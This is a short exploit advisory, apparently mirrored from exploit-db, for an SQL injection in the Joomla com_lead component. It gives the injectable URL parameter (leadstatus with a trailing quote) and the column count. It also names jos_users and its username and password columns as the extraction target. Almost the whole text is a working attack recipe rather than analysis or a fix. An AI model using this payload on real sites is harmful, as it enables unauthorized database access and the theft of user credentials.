Joomla! Component com_lead – SQL Injection - 体验盒子

作者： ByEge

日期： 2010-06-03

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12868/

[TR] Title: Joomla Component com_lead SQL Injection 

[TR] Date: 03.06.2010

[TR] Author: ByEge

[TR] Homepage: byege.blogspot.com

[TR] Vendor: http://www.leadya.co.il/

[TR] ExploiT :

[TR] index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' 

[TR] column number : 14 
[TR] column name : username , password
[TR] table name : jos_users

[TR] Th4nks : KaTLiaMCi06 , Fantastik, MitolocyA, ISYAN